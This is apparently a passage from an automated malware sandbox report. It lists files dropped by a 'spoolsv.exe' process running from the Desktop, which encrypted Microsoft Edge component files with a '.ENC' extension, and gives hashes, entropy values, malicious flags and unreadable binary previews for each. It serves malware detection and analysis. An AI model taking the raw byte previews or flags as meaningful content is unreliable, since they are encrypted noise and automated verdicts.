                                                                                                                                                                                                                                                      Preview:.;.........bBc]..W...a"..........4]..J..}O./.a.. ..)..!...=..p...w....v%Be5.|8=.gJ..,}..%.....>....L0...?:.nZ+........<n...L.i...3....O[...K...-.1....r./G../........P...X....O..,..1...tc4.>.Z.......G1...0....NPX.s,.+....J.a&.....K.1r...=.=k.^6.2|z}...I...6S.....g....$.e..2.....?.9.5n.`S#.....h.3;.K...$.q..pNw... .*b...E&)2_...1......|.h..H^....8.Z..../M...\...e.w....b.<$8w.?.$=...o.+...Dw....@....c/./U.&.....q.[.*.oXc.4.na.Ef.<..Cs.<=w..y...|.......X..N..;u...t...T..=\.....,fe...>...-..J..C...C....5<.5.k$....I.[......W..r..#{...>2.xi;.f...F.;.W......5.D=.%#......0...J...m......9.r.p.......[.....(0..,.o.(....-H.q.0.i.....y....&.p.t.......i\3.....I.....n:A.$..s.OC.....w.wc......5Rw..>.mOoF...{e0.l......:..)Ml.j(..Tl.2.-e.|c........(9{.R........h5.x....i..../....Sx....9.T;...Y.{.......}C.......3..<.k...+.RB....n^j>.r.......u..gdAR13...f..@...cp}....K.\....a..".R.......~...<.F9V;....u....<..E....(J... .s...H5..b..N[#|}.T.{vl3..K.O

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\manifest.json.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                                                                                                      Entropy (8bit):5.84375
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:17WYj4b6ORWOG10eUtyWZ8bocn:xWYj9+WOaUtv8Mc
                                                                                                                                                                                                                                                      MD5:30ECEC1C6B82C7229CC92C3D16B91305
                                                                                                                                                                                                                                                      SHA1:BAB3D53F6DE5135A6C96D99F497A9DD30617D84A
                                                                                                                                                                                                                                                      SHA-256:9484E5916D8FB2452F1BBE22EA0791114DFDA6155703A30E1CA9423C60C183A5
                                                                                                                                                                                                                                                      SHA-512:7461AE015D9D6BBAF383D38E7EF7E27B9B0EA40717AB60B1CFC49ABE280E8FEB45EDC35113D0AAC8DD26122A1DAEE17E029D4EABCEF228F1B2500B68094E27B7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:GS.....3............N..~..4.VX;4c.[.....%..+....T./..JZ_uw9>.9

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Designer\1.0.0.20\InputExtractor.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):11568
                                                                                                                                                                                                                                                      Entropy (8bit):7.984425913890206
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:t/9gugqnCu+qsYWZQ56cFKqmZDNqdKCZtOnEDfD6MjIRdsejH+ZRZ2RXU:t//Cu+MWZsreq46tA6fD6mIZjGP8U
                                                                                                                                                                                                                                                      MD5:D6ECFA5EEDD78D47398B45B81CEE424D
                                                                                                                                                                                                                                                      SHA1:972C5FB704010FE02D19DA342FA02A3CEFC48CEB
                                                                                                                                                                                                                                                      SHA-256:B1ED22468B6BC2D4A557431721FABB06513947AAB894B3ED255EFCDEAC295E8E
                                                                                                                                                                                                                                                      SHA-512:30E3A45602BF1A12198AF923A6994D3ECDE6AE75B9E66AA09F23B4BB0EE87A0CE2169E34760CA3A0C449816F6A595B5F2C1A48FE64CFBB682422D24B98CC69F8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:f....O}h~. #2.m. ....v.dfA$.l..8K..d......\>m...|...j.f.........41...3..d....R..\.H..~.J@....0......u]+....pJjt.[.....2..0Y....2I.....1.lbqE..}r..3..._@.....;.k.|~.;..0......C.\?......S......~D....m.'.I.W53H.&A..C.-Z.s..o...x.2V3.I%.i.t.......1s...B...i.*7....H.E........n..I..Tp.Z.{.jF..F.6.1.c."lI.V.o....E..k....m.x4.........g...e..zr,.a.9...../'..OO.... .K.n_...........]lY......(..h.h..kPF?en.d.....H.....K....?..#+w.yi..b.(...3^..ZL..._^...3...!.x..l.BgU>Y....n......CF1.].......B.f.vr.w...T.qB.9.:...@.o..;..JO.K....C.50...\..K....a>@.@..9W..j.. .Y......$....(.i........O..".....EB..2.@"....@.B4.......N..K..#..D.N!..I...3.......?E#..C..3`....y.\.x.R.q%'..w5......;Z.Th3]...L...+.>....7.U...MZ....[..?.s......c..<(.B.a....jd....h....P....1$7...kI......R.......c(..X.......!wm..Nj....BU.@.<.yD....V.x...9..t...N)..Z....F}.7.JSB..j..TAf<..g..K...-..:. ....6..B.%M..$'t..e..z.8M.bNT.-..1.&~.\..<}.%]..2g....=.........t=8Og......u..J&... (!

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Designer\1.0.0.20\manifest.fingerprint.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):80
                                                                                                                                                                                                                                                      Entropy (8bit):6.096928094887358
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:cBuMWMsBCDFKEtM62vg60ta7WvICv:CuiFKWMovtak
                                                                                                                                                                                                                                                      MD5:7263BD2F6A8A06C3907DB3B46B1A9425
                                                                                                                                                                                                                                                      SHA1:63828108ED8837573E0B02CE5AAF9CF3002CDF16
                                                                                                                                                                                                                                                      SHA-256:E685A10285144FB9D3577AD8FDCAACB5863CD31C27B73264412EED2E588F4BF2
                                                                                                                                                                                                                                                      SHA-512:F47459FE53C956EEF8433A2FA6E525752288B3829B76EF2F6B63E51F330B247BF14694F871321BF1B033C2290AAE5A1CE45741461EEF50DD8F61597AFD82208A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..).vb.."=.Z`;...V.|g....R...Sfg...oY.&.1.99.......aV............U?....m.J

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Designer\1.0.0.20\manifest.json.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):128
                                                                                                                                                                                                                                                      Entropy (8bit):6.513557324168044
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:HtKWTadeoGzzmMxTOK2XqJc1PS1Q5Cn21LrHMMksfoJ9q:HJa/MxTOK2Xza18H1Xz8Q
                                                                                                                                                                                                                                                      MD5:31DD947CA88CC77969B6CA484345AC7D
                                                                                                                                                                                                                                                      SHA1:F6252844DA06547FCDB265D818841F356456B125
                                                                                                                                                                                                                                                      SHA-256:643836AB2AA77EF855DECD770861A9E1ACFAD9ECB99CC668550BF20C0D1A8358
                                                                                                                                                                                                                                                      SHA-512:A48D29DA8D3E8E600A8F30ED0B9075536A556DF62F59D79D1A9076B8178E1D99D01C91BE42D941BCFF40D9FBCDBE9B7E271CCDE1A15C927A8B7918866B4FECF9
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.._C..D..eZ....N.uS....u.... c|..*...MR..6M5.....5...2.,.....B.0.f.....?..w..gs.g.&v..Sb0....$.+"..(JO.....%,r..O.?\?...db.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_driver.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1680720
                                                                                                                                                                                                                                                      Entropy (8bit):7.9998900604604835
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:49152:2+YBW/VeTU3RgusDCK5i+4SS6BFZwCCByq1e:OOgfDCKx4SSQkLByqY
                                                                                                                                                                                                                                                      MD5:541737DACE0FB3A99443115792AE0135
                                                                                                                                                                                                                                                      SHA1:A35D728BADCA9CE816D929D19438F692D4D36D6F
                                                                                                                                                                                                                                                      SHA-256:019851B81D5B85B5C4E917F63498F7F7DD8D8930C808C9C7514E4703B43270F2
                                                                                                                                                                                                                                                      SHA-512:2363DC17AAEDB797C019F3062346D1581D63FD9CDDBFA6721D317A259C78978B6C61A772C06C8050C9C5288863EB85ACCDAFF20CD3D5322E6536EFE54528515D
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:&..gF...[.eS~r.k..R.C...T.....[.Y;.f9.._OG..Yr.<Y.<.........O....ui...3(..-[,......Y...n.=...S..y.G.Y..2.!...%.).y._.....6.....]".G9...7.'^I?jn&.c....X[.......0.7\..\....,V|cV..P.O..9.F..s..R.8...;..9...`..........8..)...8_.F....j..<....+%B]q..33../,I~_4..#..........g....4/.s:..U..1P...X.b..<...$.R*.. .zG'F..-...W*..WK.B....*._.1.w..xyrI...u*..+..S..M/+.U...-..2...E......^8.S.F....3.V.'.0...E...u.C.#G].H.YWeC.&.bq.#..<....i..G.(.|.L....aH.....d.R.[ ...].g..K.w.....p|...L+dyw.X.".6u.fE....BZ\n.e4..:......[..../.8...3......\>....1........K....U.8.%.Jy.(.y).Y....o...cc....J6..JP.;...H.k.\..(u{...h.......?..TS.A..x..(t...E.VO..7.P.U.e......e%..s#sY;..T.............i....?b.....{.....c.&1!.j.C.o.z.E...c./..2..B...Z..6..a..P...m.^.....0....?TVZC0e... ].V.3.f5B..EO.[c:h.HZ..sa....Od...G..{I........S.j............gE.........*..p..<G.P..#.p.@K.k......^...g....{.b.;..y...s......o.z././.5.u.jC.....%.IUxS..@..M....k.o.F..<.Y..Yv.i.t...H.....kX.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\manifest.json.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):160
                                                                                                                                                                                                                                                      Entropy (8bit):6.785837860444755
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:HtKWTadeoGSvJkPyfWXAUtljeFa2vbofNbToO6Uy1kGJNPsVI+uqPUJlI9AmR:HJafv6XxXIJWQO6r1P/PaI+XPQlIV
                                                                                                                                                                                                                                                      MD5:79AE7596754A546AABBD6261A9F0C248
                                                                                                                                                                                                                                                      SHA1:D2EBA8D7D9E8013A34FCAE9676E01E0702EFB577
                                                                                                                                                                                                                                                      SHA-256:B668E64EA234EBB5D820042294B4D7C9760F48AD0CECF2477385A7D0B0DF3DD0
                                                                                                                                                                                                                                                      SHA-512:EA351892ED0CE8DA237AE14BF054B2C205A7C8FC3FCD661963E1A337AF4087A783A03708ACFAAC0DAAB73DA7EE9DC046463B3CF92A4D56FCB96840ED7F873F3F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.._C..D..eZ....N.uS....u.... c|..T..0:..Y.~.L_..0.E..T"..e..yQG....z/|.q6....~...4z..N-.=....m.....}qW..v.f.Y.clH.3.2j.(>...N..i.q.n..GL.E.6.!Er.......K....J.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\product_page.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):988320
                                                                                                                                                                                                                                                      Entropy (8bit):7.999830550740216
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:24576:3wS9Hm1EMkV8HWMplvSlp2tIO58exTQI8JX2mLZ5JSwAisaOuKnUZ6:1Rqplh12aTQI800Z58HsFZ6
                                                                                                                                                                                                                                                      MD5:1EFCBCF398EA0991EEF03BD018B124FD
                                                                                                                                                                                                                                                      SHA1:6F331481195B69C97E2C4359B8CB1F4787DAFF91
                                                                                                                                                                                                                                                      SHA-256:21DC2DDF8B26E20256394AB67CEFD05E613F1FEA2AB37306386EA85706052173
                                                                                                                                                                                                                                                      SHA-512:30BDE9B3CDBAF64B0B47D3AB2D05E6AB2A3FE2F1CFED81B88C49CF9302A20253B7B978E02B8F892565840EA7AE2EEF52E063B28FFA04D29B732B8CC48ABA03A1
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:&..gF...[.eS~r.k..R.C...T.....].zs.((1..vu..}T.X..Zm....hj'@.j..+...e.o...X.M....D.5eM#...j.D...C%..J6H..g..Q...h-'....?fy.G.D...7-*.m.^...J...S.,.w2.cgz.}3].DJ.hk.=.#.B>.xn.Zf!.fkV.A^>T..>|...@.'v.|..*....9.Y.g..s.Z...F..z.*.9 q.[..K.R.r.<..?.........8.*..58y. .......................<.pQ.a.t.S.&...{..B....Y..3N....3.......9.)-8...O+.,s...<....v.B..k./x...O..F..o.Cs.......P.....x.....t...9L..C.>.ep?4...?cWq...w.{.?.y%..w.;....t.M.....7...!X.l._.Fr?2h.&I.^.>75.o.[.ZQ..9.yr'.'`..?...J.,z.....0.Q.W^.8.[...=...HqjoGvc...f.wk. +\.....1.T.GYj...IB.P....S".U./.....~W.E..IU..k. cP^:.NY5f....`....Hx..4.>....%Y8.R.]....59k....@..v.&.3[....S..9._r..1K.R..cI.......<t...0@..o.Z.l...V4...~Q..#}....(....{.(....\.t{...Q|qF_..w.k....|lYe..\.-.=)?.%...|...x..S.R$..........E........rdm..(I..a...6.e...+.7....FK.!..T...6..2.e.b.g....N...0.6z..%.k.3......ZO.#!.2(......n.....}B.......t.;..(.....Ey.......{U*......}./..,.L.^....>....+w...F......t.*Is...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shopping.html.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.8397342912719825
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:dJtQjhR0MtXSAXUo0+KhDZtMqNpbvqSt6FKCQ4VegSlM7zqiYCPJF6h:Pts8MQ/oaNM2dCu6tIgSuqiYMf6h
                                                                                                                                                                                                                                                      MD5:A4C8102D01713910971103C9DDE7528A
                                                                                                                                                                                                                                                      SHA1:B53413A745CDD72B5F14E8BDB9CE838E010B9213
                                                                                                                                                                                                                                                      SHA-256:FCB049189CFE8EA67B47C0F4F2648120888238F8BC5683330C895C4BD8BBA073
                                                                                                                                                                                                                                                      SHA-512:5EC9EE7BE9DB1EB160E1FA43B1FDE0E5C72C06AA55AE059771D58B8B3062A0D13261B6D7EAC49A161740560BF1EA50EF1018038722BA965270D74817E2122B3B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:c.....`w|'..........a.k.-.B.N_.].s.v..:3.#Z{..x..k,..TE..1..|.v..<P....~.qh..D.S.f........i.......... 9.p...1.T..j...@[@.M..H.d..7..=|..P.....3 Y.f.."....8d....Z!.!.o#(It[.&..).....%4.<..{.".f.....i...]....W.nw..^...7.N>..k....I.M.8.F..L%X....j..z!."..2....v.#7'..'e.......]..&I.4.... @....`.h.J..T..../AJ.<b.y.P.x...-....%Pwo...3EG`Y.l...+..^]......c....+.,z|.....`V.0N.........Q.|.m.....o..+.O........R.....l|....~.u?.71....@.xIqH..Hs....)L...!T.~.y]OEd..........3.a~s.l..w..y...1..~.].t-...`s..sv.3..|.f......f.,.oN..yc,.o...;.V...~;w.5}%.......e....Qgk.,d.j..`}....CE2...$.#.}7....yQ..s.-....?..$ZJ.z~...m..w.u....L.IZ.|.].S...16.Ix.;c.p.9..-.B.B1.n..#..S.....%z;..F....f.+en[D...xoH.e...C3..=.Y..t..X....{.....c....Mk..y..>%.0..w....W..m..u.j...)..Z.p:....."3...PU....../...w%e.#...ww=di. ..Q...0..d(.Q....'...b..Q..{.j..m!+.M..;s>...u/..[^g@.}.0...;.....V.e...u.O....j.....,...].x2.x.x...}Z*`.w..NId.|dc..l.W..S...3....hcE..&....U.#.....p'.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shopping.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):5653280
                                                                                                                                                                                                                                                      Entropy (8bit):7.99996738125966
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:98304:U8dFZYN/eOfJJLXVd4AlJsoQDGTD6lcH5eqsuaJ3Qc:LZY9xfJJLld5JsoQavX5eec
                                                                                                                                                                                                                                                      MD5:84688526100F516BB9DFFEE668239E2A
                                                                                                                                                                                                                                                      SHA1:E4E6F86C13AE94ECB265C7C9866CA89CD4480B59
                                                                                                                                                                                                                                                      SHA-256:0336773FDE81D9093B3AE1B6129234479FFAB22187AEE0693FAA6439D0D23A38
                                                                                                                                                                                                                                                      SHA-512:9AFB27801BC2CC8FD374491FC77A63925598FB7240181F4DEA7FD1F7C15203C4DCA3B27624EBFB5BB49356EDE57A2A484B49EA5395A3048F74A576D1B20C9DDC
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:&..gF...[.eS~r.k..R.C...T.....P.'.Q`.S3..|Q....g.Fwm>.x.z_N.wl...3C.>...u.....#...F..f...P..,....zDKoe.!s.,{..o;..-..4.B..N..O..t>.'.Cy..f.P%..[..*....A...P..[78.).2r.LX@.t....).CG...%..Q.p....a!Y......,N+Y.......M.!..t0p..tR..p86.X.J...K].m..JgpC....|6Y..E.@wF..uYtrt.3.......2,R.E....,.....H.&.$,.'.T?6.:.F..\N.}.mq..........o...=i._&a5..~jm.....FX..fj..[.|c.u.....$G...O......eU<c.2cL.h.......%.....r.]..4....)X....Q...N.\ o.BHR....lV.1.t.P._hJ..yL.T-.v..R#..sO.*.wd...;~.k..q..:....r.GE.[+.r..yDT........TE.....~_.,..........a.!...w.5AV..),$....>.:.`qp-..A..w~f..\.-..;t..|..[.V..x.g..........Af...].....).iX..~..Y:.:..2V...LQ.......h...6..F.5.ZK6...1p@...t.W..h........]..F........s.+.u...^E..2=...]q.li.@..z8.p..-..B.@P_.S\h.fZ5.L'*.}y.m.n..F^R.A.SA_B.}?*9.vDD.Y.\w.XBW......L=.6...3T...gI..K....l...`t.j........F......L.!I".s.VU.O(..2$.+...'...%.#2.B.4.3E._.J>1..V2.....[....BT...\Pujz.M...p..EA!S...t...3.ssx..0..u....^.....1..7.an>.Zf,.~...b.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shopping_fre.html.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1152
                                                                                                                                                                                                                                                      Entropy (8bit):7.805256457166832
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:1vK1GtsN1gVSjccpjmGHSPHHJyHUEnmFlCbquj1trnYtSZD/Io5nA3Lwc:Uhccpj/yPJy0rn+qO19n1I0nA3Lwc
                                                                                                                                                                                                                                                      MD5:486557B7712A6C4C5F3639BA9E9E5AAF
                                                                                                                                                                                                                                                      SHA1:86FCC513B8C82145D106AF34C49C6FA9D5DB1A37
                                                                                                                                                                                                                                                      SHA-256:F2BDF89F6D7374DF2E9B8CAD3210181563F61FB0C8937A834AF73BF7B3D3321F
                                                                                                                                                                                                                                                      SHA-512:229BCE281C6AA79AEB1FCC82F8E35F91BFE2E57E1915231C30D0A79BCF3E915E8C2885AF114AC1C464284A2A3E52D76E9B238CD0AA94E12E25499653B9D761C3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..v..^._...G.OC.....(15.I..2.:....Z&tL..@e..eO..ib.T.......<.......C.Wl....!..2.].P.$. x.y..L.?..XH.8.;.4...{...|H.z...& v..'N.........x<.K.Lf.se.....eNUj.....0p..x...........}....(q.MYI.!z....j/..d.;s.....Z.........GpSt`. ..2P..zW pLud.3....b;..h]8C}..M&.s.ec..4=.....C..sF.g.bXe..zz..\..3B.A.o.i...t...<...i.8.l...j{.]..aj..yv8..x?m.P.O.{sNk..h.IN.`9.....k..cR.@........-.v.....i]:.l..Ji...PI./.....E`t.~.jC..2............O*...#.B ...\..adfG1.........).c\."...exG......p.2....v...}@.1..B.lp..<.\.x{@@=...[.4.....S....]..m.C.3..&-.....F.?.=.5.z.oO.........%.6...6.%f.ey.L.7#..M.U....V.~Y5....x...%......0yXJ7Zs..{../..{k`=<.0..y....%t.&R.....WF6.k.3..^L}.<..p.U.%D.]7.iFsN....<>;.'.i..(...4.F.....s.1.j0yy....p..n....&n'...cl.F.O.......}-.....5.G.Qh...K...0:...g............;..1.6.D..y..X...`....i.....|8.ViK..3.N.9.{ .l.6...{...RvD.P.9y.A"..a.w...b.{.....H.u.j(<q....!..p.....ftM!.Y..tx....L.n.,.{e:.j2.....pMWa.u...E.;.%.F.>cJ>y..`...W.3".eVY...7.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shoppingfre.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):357776
                                                                                                                                                                                                                                                      Entropy (8bit):7.999468439062784
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:6144:7xXZkuE24SeZaCfy2+Hr3yNfBHtZ55cl3g97nadN2k55zVKplPipkFC:VXq0xCfyx6Tjc1lGplyZ
                                                                                                                                                                                                                                                      MD5:1490EE374103DAA8D20117B637D7DA0D
                                                                                                                                                                                                                                                      SHA1:5E0D54CCE0DA9B6C2A5F100D66DF695A8DE6DFF7
                                                                                                                                                                                                                                                      SHA-256:EA31816FF0A98C54542F1E1A64D2EED1296B10273D370E8DBFB5287E0EBC3CA3
                                                                                                                                                                                                                                                      SHA-512:2919D68F69D2EEFA611B777C01C6068F612363188A129E16816D6BB92CCC66EBD8665450C7DCE3CB748C95E0B1E9230443A40D3B05CDB9C8BF76DB6709D2085D
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:....T..]6.....p.."5oXw....>.m..#........p.^.....%.*.r...;...W|.j...../S..o.u...h..E}...:..B...s@z:..k.&C..U7zK.9..... ..S..Ti.PI..X .:\zc.~....7.f.#P...E.7.$.....].,..4j15..T...A5:5....y..jp?.'...0.4c...q....|..J.......h.X..B...Y.....R...#.....R.....!./.!....w-....?._...j..K..'..~U.lu...`..4.4...."..........N..6...2{;d$.}.(;.....-.....{..-V......eu.).;O...".=.[...e......}.@.rN.sA.c2p.....B.#...t,......[d...a..11s.?{.Px..5b.<...z.".D.......q<}L}.~e.N!.e2IF.Z..".#..s%.,c .5..~..Y.@M..*iQ|.::.0...=..&.Em....mN....Dd.%........K.(..8'..e.B1zU.....Su...N.....Gs.....H..'.X6..ZW..Q.<.6T.GAGe4.. .o.0$.-......|..C..h...o~.,.T......I....Y....|.....Bn.g......4+.O...~.........}..=.%Bur.0`N.O....B.W....XB..!.w./...j....%..=.....!Jsi..a.........[...z!.my...A[.6g.Vle.G.5..pNY!..)........(....^.2B...........J.F.v...o#.Jz..H..l>...u.d..?0.m.c.c.IC....SU.=.R.....l.....Dy..xy.Y._B........9.....+;AW:-P...0]......J.......v........;.....BE.O....q...9.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel\1.0.0.2\automation.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4272
                                                                                                                                                                                                                                                      Entropy (8bit):7.951530424691164
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:xxn1E7QUS1WVE/KfLtIvTkrSSSnzll4Tw/D9lq0:xJ+7Qp1l/KAiCnYTKq0
                                                                                                                                                                                                                                                      MD5:BA4E7B270C67224700801588FAE0FD56
                                                                                                                                                                                                                                                      SHA1:48F39B52414F9F644755D30B3068FAC5598DDA55
                                                                                                                                                                                                                                                      SHA-256:34078B3A78A9B3BB7951E22FF0B6EE6305C87BBB6F4159442987A0BF1BA108EE
                                                                                                                                                                                                                                                      SHA-512:C4D3F7646E9BFB94E028C05CE4E3A9AFB09F0B1FAAE354C1C959D1AC7F3975F482ACC66AFEF277ECBB2439F6B9364E93F1A8A28D1BC99F4DED34BE9D086AB403
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:f....O}h~. #2.m..Z..~.[cT.B..A..3pPPo...........Y>.~..`...l!u.4..............5\..kF..Wp@.z.7= .N.L3..J.b.i.jU5......o....8...'.{..N"..8...<G.w..-.y.3;`..).!.....u.....U...MUK...;}A.==.W. .f....u.g..8.......8_.......~.L.....@s..G.q...]4%r..GA....)~.[.Z`a3..h.../.=.4.q*/.......n..$b.j...;w.....G../+\.q.o7.1.6..=.;.a~.-..K..9.g&C#Vv~.j~....'.8R&.'.E.(?.N.dv........(..7M...6lA...P....*_..Q.*n\._1...t.>.....#P.p...6......s..GF.v.m......*qR.j..K.v.PqG..(..E.L.B..gJ.2.8...!..o.q.'.}./0G.3...*..).1l...v...E,.......2t....aZ..^....,&.}..>...sr.....|.. .. .y.r...-.9woj.&....)_.0.XmVp.D..O>....f.+.O...D...c.uV..c...6.P..Q...9...~..0.OZ..[.c.M......=7....@\.:c.....O.A....X2...}...a.....w.l.!1...{....ma.o&|.....==.r..3..!..n.x1."..D..F.*V...Ug........W.@#..|N.Gi....BcK6w.?.9.`.A#.k.j.....t?....%.`..{..o..0...-!.b...._(........_..d....a%g...-e..#oD..D.t....%.%:N...#....z..\.g.t..~...#.<.5#.x..V.K.-...q.8... AL..i.`t..y.).Bdr._n..i..A..).[.....T.Y.y..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel\1.0.0.2\classification.js.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):864
                                                                                                                                                                                                                                                      Entropy (8bit):7.777817157939023
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:vY1SR0APpkX5KbHPLtxe0uTEKmQZIwi22d:vYPOecPLbeDE7QewS
                                                                                                                                                                                                                                                      MD5:5383324F04A3ADC101120E695C555450
                                                                                                                                                                                                                                                      SHA1:0FEB6CD5D54913D25B6A57B8763FD7A996ED537C
                                                                                                                                                                                                                                                      SHA-256:2E337C6A1BD6ED5F083F6AFAC44920D95133160877E3A9D966626AE77A4C996A
                                                                                                                                                                                                                                                      SHA-512:1F016FDAEFB50C5AA593EEB317AC7800D8F9A1C884DB453C798BB8B97BBDA04580DC1D2801EDB689E5F43057B973F3BAC0012326619FA3E3D37BEEE33413B116
                                                                                                                                                                                                                                                      Malicious:false
